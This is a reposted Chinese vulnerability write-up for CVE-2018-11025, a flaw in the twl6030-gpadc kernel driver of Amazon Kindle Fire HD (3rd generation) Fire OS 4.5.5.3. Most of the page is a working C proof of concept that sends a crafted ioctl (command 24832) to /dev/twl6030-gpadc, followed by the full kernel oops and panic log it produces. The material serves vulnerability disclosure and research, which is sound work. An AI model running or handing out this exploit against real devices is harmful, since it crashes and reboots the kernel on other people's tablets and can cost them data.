(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞

admin
admin
admin
102714
文章
87
评论
2022年1月6日00:43:04评论66 views字数 13274阅读44分14秒阅读模式

一、漏洞简介

Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3内核组件中的内核模块/omap/drivers/mfd/twl6030-gpadc.c允许攻击者通过设备/ dev / twl6030上的ioctl的参数注入特制的参数-gpadc命令24832并导致内核崩溃。

要探索此漏洞,必须打开设备文件/ dev / twl6030-gpadc,并使用命令24832和精心设计的有效负载作为第三个参数在此设备文件上调用ioctl系统调用。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
 
/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/twl6030-gpadc causes 
 * the system crash via IOCTL 24832. 
 *
 * This Poc should run with permission to do ioctl on /dev/twl6030-gpadc.
 *
 */
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/twl6030-gpadc";
static command = 24832; 

struct twl6030_gpadc_user_parms {
    int channel;
    int status;
    unsigned short result;
};


int main(int argc, char **argv, char **env) {
        struct twl6030_gpadc_user_parms payload;
        payload.channel = 0x9b2a9212;
        payload.status = 0x0;
        payload.result = 0x0;

        int fd = 0;
        fd = open(driver, O_RDWR);
        if (fd < 0) {
            printf("Failed to open %s, with errno %d\n", driver, errno);
            system("echo 1 > /data/local/tmp/log");
            return -1;
        }
        
        printf("Try ioctl device file '%s', with command 0x%x and payload NULL\n", driver, command);
        printf("System will crash and reboot.\n");
        if(ioctl(fd, command, &payload) < 0) {
            printf("Allocation of structs failed, %d\n", errno);
            system("echo 2 > /data/local/tmp/log");
            return -1;
        }
        close(fd);
        return 0;
}

崩溃日志

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
 
[18460.321624] Unable to handle kernel paging request at virtual address 4b3f25fc
[18460.330139] pgd = ca210000
[18460.333251] [4b3f25fc] *pgd=00000000
[18460.337768] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[18460.343810] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[18460.351440] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[18460.358825] PC is at twl6030_gpadc_ioctl+0x160/0x180
[18460.364379] LR is at twl6030_gpadc_conversion+0x5c/0x484
[18460.370452] pc : [<c031b080>]    lr : [<c031a950>]    psr: 60030013
[18460.370452] sp : de94dd90  ip : 00000000  fp : de94df04
[18460.383422] r10: 00000000  r9 : dcccf608  r8 : bea875ec
[18460.389282] r7 : de94c000  r6 : 00000000  r5 : 00006100  r4 : bea875ec
[18460.396697] r3 : fffffeb4  r2 : 4b3f2730  r1 : de94dee8  r0 : 00000001
[18460.404113] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[18460.412048] Control: 10c5387d  Table: 8a21004a  DAC: 00000015
[18460.418609] 
[18460.418609] PC: 0xc031b000:
[18460.423583] b000  e24b101c e30f3eb4 e34f3fff e0822082 e0812102 e51220e4 e18120b3 e5973008
[18460.434234] b020  e294200c 30d22003 33a03000 e3530000 0a000006 e3e0000c e24bd01c e89da8f0
[18460.444885] b040  e24b0e17 e3a0100c ebfcf5c4 eafffff8 e1a00004 e24b1e17 e3a0200c ebfced7f
[18460.455444] b060  e3500000 0afffff3 eafffff1 e51b2170 e24b101c e30f3eb4 e34f3fff e0812102
[18460.465972] b080  e5122134 e18120b3 eaffffe3 03e0303c 150b016c 050b316c eaffffdf c0acabbc
[18460.476623] b0a0  e1a0c00d e92dd800 e24cb004 e59030e0 e3530000 159000ec 03e00012 e89da800
[18460.487182] b0c0  e1a0c00d e92dd800 e24cb004 e59000f0 e89da800 e1a0c00d e92dd800 e24cb004
[18460.497863] b0e0  e5d020e9 e5d030e8 e1820003 e2000003 e89da800 e1a0c00d e92dd800 e24cb004
[18460.508544] 
[18460.508544] LR: 0xc031a8d0:
[18460.513519] a8d0  e89da878 e1a00004 ebffff20 e2000003 e3500002 13e0000a 03a00000 e89da878
[18460.524078] a8f0  c09ba0c0 e1a0c00d e92ddff0 e24cb004 e24dd014 e2509000 0a000114 e59f5454
[18460.534759] a910  e595008c e3500000 0a00010b e2800004 eb0e1ff0 e1d910b6 e3510001 9a00000a
[18460.545318] a930  e595308c e3e06015 e59f142c e5930000 ebff4e6b e595a08c e28a0004 eb0e1f69
[18460.555999] a950  e1a00006 e24bd028 e89daff0 e595a08c e3a03f52 e023a193 e5933038 e3530000
[18460.566680] a970  13e0600f 1afffff3 e59a32c4 e0818101 e595c088 e3130010 e08c7008 1a000025
[18460.577331] a990  e3510000 0a0000c4 e1d930b8 e3530001 0a0000d7 e1d940b6 e3540000 0a0000bc
[18460.587890] a9b0  e3a0000e e3a01002 e3a02090 e5956088 ebfff8bc e3540001 0a0000d1 e1d920b6
[18460.598571] 
[18460.598571] SP: 0xde94dd10:
[18460.603546] dd10  00000000 0000000d de94dda0 10624dd3 de94dd4c c031b080 60030013 ffffffff
[18460.614196] dd30  de94dd7c bea875ec de94df04 de94dd48 c06a5318 c0008370 00000001 de94dee8
[18460.624877] dd50  4b3f2730 fffffeb4 bea875ec 00006100 00000000 de94c000 bea875ec dcccf608
[18460.635528] dd70  00000000 de94df04 00000000 de94dd90 c031a950 c031b080 60030013 ffffffff
[18460.646087] dd90  de94ddac 9b2a9212 00000000 00000000 00040000 0001f8fc 00000000 00000000
[18460.656738] ddb0  c00795a0 00000001 de94ddd4 de94ddc8 c00795b4 c00792bc de94de0c de94ddd8
[18460.667419] ddd0  c0070df8 c00795ac de94c000 00000001 00000004 dd32f8f4 60000013 00000001
[18460.678100] ddf0  00000001 00000004 dd32f800 00000000 00000000 de94de10 c00723a0 c06a4818
[18460.688629] 
[18460.688659] FP: 0xde94de84:
[18460.693725] de84  de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0
[18460.704284] dea4  000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000
[18460.714935] dec4  00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000
[18460.725616] dee4  00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044
[18460.736328] df04  c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8
[18460.746856] df24  de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000
[18460.757537] df44  00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000
[18460.768096] df64  00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000 00000400
[18460.778625] 
[18460.778625] R1: 0xde94de68:
[18460.783721] de68  c2572140 de94debc 00000001 00000028 000fffff 00000001 de94dedc de94de90
[18460.794403] de88  c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0 000fffff
[18460.804962] dea8  00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000 00000001
[18460.815643] dec8  dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000 00000000
[18460.826202] dee8  00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044 c031af2c
[18460.836730] df08  00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8 de94df0c
[18460.847381] df28  de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000 00000000
[18460.858032] df48  de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000 00000000
[18460.868713] 
[18460.868713] R3: 0xfffffe34:
[18460.873687] fe34  ******** ******** ******** ******** ******** ******** ******** ********
[18460.884246] fe54  ******** ******** ******** ******** ******** ******** ******** ********
[18460.894805] fe74  ******** ******** ******** ******** ******** ******** ******** ********
[18460.905456] fe94  ******** ******** ******** ******** ******** ******** ******** ********
[18460.916137] feb4  ******** ******** ******** ******** ******** ******** ******** ********
[18460.926788] fed4  ******** ******** ******** ******** ******** ******** ******** ********
[18460.937347] fef4  ******** ******** ******** ******** ******** ******** ******** ********
[18460.948028] ff14  ******** ******** ******** ******** ******** ******** ******** ********
[18460.958709] 
[18460.958709] R7: 0xde94bf80:
[18460.963684] bf80  de926680 c00635cc 00000013 de84190c de926680 c00635cc 00000013 00000000
[18460.974365] bfa0  00000000 00000000 de94bff4 de94bfb8 c0068af4 c00635d8 00000000 00000000
[18460.985015] bfc0  de926680 00000000 00000000 00000000 de94bfd0 de94bfd0 00000000 de84190c
[18460.995574] bfe0  c0068a64 c004cd64 00000000 de94bff8 c004cd64 c0068a70 1d04e2fb 1dfbe204
[18461.006225] c000  00000000 00000002 00000000 c2572140 c0a0e840 00000000 00000015 cf9fca80
[18461.016906] c020  00000000 de94c000 c09ddc50 c2572140 c25717c0 c1617b40 de94da7c de94d9c8
[18461.027587] c040  c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[18461.038146] c060  00c5f4c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000
[18461.048828] 
[18461.048828] R9: 0xdcccf588:
[18461.053802] f588  dcccf588 dcccf588 00000000 00000000 00000000 c06bc674 000200da c09dda58
[18461.064483] f5a8  00000000 00000000 dcccf5b0 dcccf5b0 00000000 dcccf5bc dcccf5bc 00000000
[18461.075134] f5c8  5ae3ed25 00000000 00000000 00000000 dcccf5e0 00000000 00000000 00000000
[18461.085815] f5e8  00200000 00000000 00000000 dcccf5f4 dcccf5f4 dccb2440 dccb2440 00000000
[18461.096343] f608  00052180 00000000 00000000 00000000 00000000 00000000 c06b9600 dd1a4800
[18461.107025] f628  dcccf6e0 dccb0300 00000c45 00000001 00a0003b 5ae3ed25 2bc5ac58 5ae3ed25
[18461.117675] f648  2bc5ac58 5ae3ed25 2bc5ac58 00000000 00000000 00000000 00000000 00000000
[18461.128234] f668  00000000 00000000 00000000 00000000 00000001 00000000 00000000 dcccf684
[18461.138885] Process twl6030_gpadc_i (pid: 12849, stack limit = 0xde94c2f8)
[18461.146697] Stack: (0xde94dd90 to 0xde94e000)
[18461.151611] dd80:                                     de94ddac 9b2a9212 00000000 00000000
[18461.160827] dda0: 00040000 0001f8fc 00000000 00000000 c00795a0 00000001 de94ddd4 de94ddc8
[18461.170043] ddc0: c00795b4 c00792bc de94de0c de94ddd8 c0070df8 c00795ac de94c000 00000001
[18461.179138] dde0: 00000004 dd32f8f4 60000013 00000001 00000001 00000004 dd32f800 00000000
[18461.188354] de00: 00000000 de94de10 c00723a0 c06a4818 00000004 00000001 dd32e0d8 dd32f800
[18461.197570] de20: dd32e000 0000000a de94c000 c26fda80 de94de54 de94de40 c02ba53c c0072360
[18461.206787] de40: dd32f800 dd32e000 de94de74 de94de58 c02c3c88 c02ba518 dd32e000 00000002
[18461.215881] de60: 00000002 dd32fbbc c2572140 de94debc 00000001 00000028 000fffff 00000001
[18461.225097] de80: de94dedc de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8
[18461.234313] dea0: c00723a0 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14
[18461.243408] dec0: 00000000 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000
[18461.252624] dee0: 00000000 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08
[18461.261840] df00: c0136044 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490
[18461.271057] df20: d8f925d8 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004
[18461.280151] df40: de94c000 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004
[18461.289367] df60: de94c000 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000
[18461.298583] df80: 00000400 bea87618 00010e5c 00000000 00000036 c0013e08 00000000 de94dfa8
[18461.307800] dfa0: c0013c60 c0136578 bea87618 00010e5c 00000004 00006100 bea875ec bea875ec
[18461.316894] dfc0: bea87618 00010e5c 00000000 00000036 00000000 00000000 00000000 bea87604
[18461.326110] dfe0: 00000000 bea875d4 00010698 0002918c 60000010 00000004 00000000 00000000
[18461.335296] Backtrace: 
[18461.338317] [<c031af20>] (twl6030_gpadc_ioctl+0x0/0x180) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[18461.348571]  r7:d683fb40 r6:00000004 r5:d683fb40 r4:00000000
[18461.355560] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[18461.364807] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[18461.374206]  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e5c r4:bea87618
[18461.382507] Code: e24b101c e30f3eb4 e34f3fff e0812102 (e5122134) 
[18461.401061] Board Information: 
[18461.401061]  Revision : 0001
[18461.401092]  Serial	: 0000000000000000
[18461.401092] SoC Information:
[18461.401092]  CPU	: OMAP4470
[18461.401122]  Rev	: ES1.0
[18461.401122]  Type	: HS
[18461.401122]  Production ID: 0002B975-000000CC
[18461.401122]  Die ID	: 1CC60000-50002FFF-0B00935D-11007004
[18461.401153] 
[18461.406127] audit_printk_skb: 111 callbacks suppressed
[18461.406127] type=1400 audit(1525657115.783:1097): avc:  denied  { getattr } for  pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406280] type=1400 audit(1525657115.783:1098): avc:  denied  { execute } for  pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406524] type=1400 audit(1525657115.783:1099): avc:  denied  { read open } for  pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406768] type=1400 audit(1525657115.783:1100): avc:  denied  { execute_no_trans } for  pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.534057] ---[ end trace f98f4a7b98572f61 ]---
[18461.540374] Kernel panic - not syncing: Fatal exception
[18461.546173] CPU1: stopping
[18461.549285] Backtrace: 
[18461.552459] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[18461.561828]  r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[18461.568969] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[18461.578185] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[18461.587554] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60)
[18461.596862] Exception stack(0xc8967fb0 to 0xc8967ff8)
[18461.602691] 7fa0:                                     404143ed 4041294b 00000054 000012f0
[18461.611755] 7fc0: 4028cdb4 4040e438 0000012f 4041294b 4040d148 404111d8 beb9c2e0 404275c0
[18461.620971] 7fe0: 40416bef beb9c1f0 4009d01f 400a0ec0 000f0010 ffffffff
[18461.628478]  r6:ffffffff r5:000f0010 r4:400a0ec0 r3:404143ed
[18461.635559] CPU0 PC (0) : 0xc003ee38
[18461.639617] CPU0 PC (1) : 0xc003ee54
[18461.643798] CPU0 PC (2) : 0xc003ee54
[18461.647857] CPU0 PC (3) : 0xc003ee54
[18461.651916] CPU0 PC (4) : 0xc003ee54
[18461.656097] CPU0 PC (5) : 0xc003ee54
[18461.660156] CPU0 PC (6) : 0xc003ee54
[18461.664215] CPU0 PC (7) : 0xc003ee54
[18461.668395] CPU0 PC (8) : 0xc003ee54
[18461.672454] CPU0 PC (9) : 0xc003ee54
[18461.676513] CPU1 PC (0) : 0xc0019b2c
[18461.680694] CPU1 PC (1) : 0xc0019b2c
[18461.684753] CPU1 PC (2) : 0xc0019b2c
[18461.688812] CPU1 PC (3) : 0xc0019b2c
[18461.692871] CPU1 PC (4) : 0xc0019b2c
[18461.697051] CPU1 PC (5) : 0xc0019b2c
[18461.701110] CPU1 PC (6) : 0xc0019b2c
[18461.705169] CPU1 PC (7) : 0xc0019b2c
[18461.709381] CPU1 PC (8) : 0xc0019b2c
[18461.713409] CPU1 PC (9) : 0xc0019b2c
[18461.717498] 
[18461.719268] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[18461.719299]

FROM :ol4three.com | Author:ol4three

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日00:43:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   (CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞http://cn-sec.com/archives/720865.html

发表评论

匿名网友 填写信息